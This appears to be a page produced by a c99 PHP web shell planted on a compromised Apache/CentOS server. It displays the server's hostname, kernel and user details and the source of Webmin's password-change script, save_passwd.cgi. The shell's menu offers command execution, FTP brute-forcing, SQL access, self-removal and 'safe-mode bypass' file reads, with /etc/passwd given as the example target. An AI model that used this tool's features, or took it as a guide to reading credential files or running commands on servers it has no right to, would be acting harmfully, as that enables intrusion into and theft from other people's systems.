!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/passwd/   drwxr-xr-x
Free 50.94 GB of 127.8 GB (39.86%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     save_passwd.cgi (2.9 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# save_passwd.cgi
# Change a user's password

require './passwd-lib.pl';
&error_setup($text{'passwd_err'});
&ReadParse();

if ($config{'passwd_cmd'}) {
    # Call the passwd program to do the change
    @user = getpwnam($in{'user'});
    @user || &error($text{'passwd_euser'});
    &can_edit_passwd(\@user) || &error($text{'passwd_ecannot'});
    if ($access{'repeat'}) {
        $in{'new'} eq $in{'repeat'} || &error($text{'passwd_erepeat'});
        }
    &foreign_require("proc", "proc-lib.pl");
    if ($access{'old'} == 1 ||
        $access{'old'} == 2 && $in{'user'} ne $remote_user) {
        @cmd = ( $config{'passwd_cmd'}, $user[2], $user[3] );
        }
    else {
        @cmd = ( "$config{'passwd_cmd'} '$in{'user'}'" );
        }
    &additional_log('exec', undef, $cmd[0]);
    local ($fh, $fpid) = &foreign_call("proc", "pty_process_exec", @cmd);
    while(1) {
        local $rv = &wait_for($fh, '(new|re-enter).*:',
                       '(old|current|login).*:',
                       'pick a password');
        $out .= $wait_for_input;
        sleep(1);
        if ($rv == 0) {
            syswrite($fh, $in{'new'}."\n", length($in{'new'})+1);
            }
        elsif ($rv == 1) {
            syswrite($fh, $in{'old'}."\n", length($in{'old'})+1);
            }
        elsif ($rv == 2) {
            syswrite($fh, "1\n", 2);
            }
        else {
            last;
            }
        last if (++$count > 10);
        }
    close($fh);
    waitpid($fpid, 0);
    &error(&text('passwd_ecmd', "<tt>$config{'passwd_cmd'}</tt>", "<pre>$out</pre>")) if ($? || $count > 10);
    &webmin_log("passwd", undef, $in{'user'});
    }
else {
    # Update the config files directly via the useradmin module
    &foreign_require("useradmin", "user-lib.pl");

    # Find the user, either in local password file or LDAP
    $user = &find_user($in{'user'});

    if ($user) {
        # Validate inputs
        if ($access{'old'} == 1 ||
            $access{'old'} == 2 && $user->{'user'} ne $remote_user) {
            &useradmin::validate_password(
                $in{'old'}, $user->{'pass'}) ||
                &error($text{'passwd_eold'});
            }
        if ($access{'repeat'}) {
            $in{'new'} eq $in{'repeat'} || &error($text{'passwd_erepeat'});
            }
        $err = &useradmin::check_password_restrictions(
            $in{'new'}, $in{'user'}, $user);
        &error($err) if ($err);

        &can_edit_passwd([ $user->{'user'}, $user->{'pass'},
                   $user->{'uid'}, $user->{'gid'} ]) ||
            &error($text{'passwd_ecannot'});

        # Actually do the change
        &change_password($user, $in{'new'}, 
            $access{'others'} == 1 ||
            $access{'others'} == 2 && $in{'others'});
        }
    else {
        &error($text{'passwd_euser'});
        }
    delete($user->{'plainpass'});
    delete($user->{'pass'});
    &webmin_log("passwd", undef, $user->{'user'}, $user);
    }

# Show a confirmation message
&ui_print_header(undef, $text{'passwd_title'}, "");
if (($user->{'user'} eq $remote_user || $user->{'user'} eq $base_remote_user) &&
    !$main::session_id) {
    print "<p>",&text('passwd_ok', "<tt>$user->{'user'}</tt>"),"<p>\n";
    }
else {
    print "<p>",&text('passwd_ok2', "<tt>$user->{'user'}</tt>"),"<p>\n";
    }
&ui_print_footer($in{'one'} ? ( "/", $text{'index'} )
                : ( "", $text{'index_return'} ));


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0109 ]--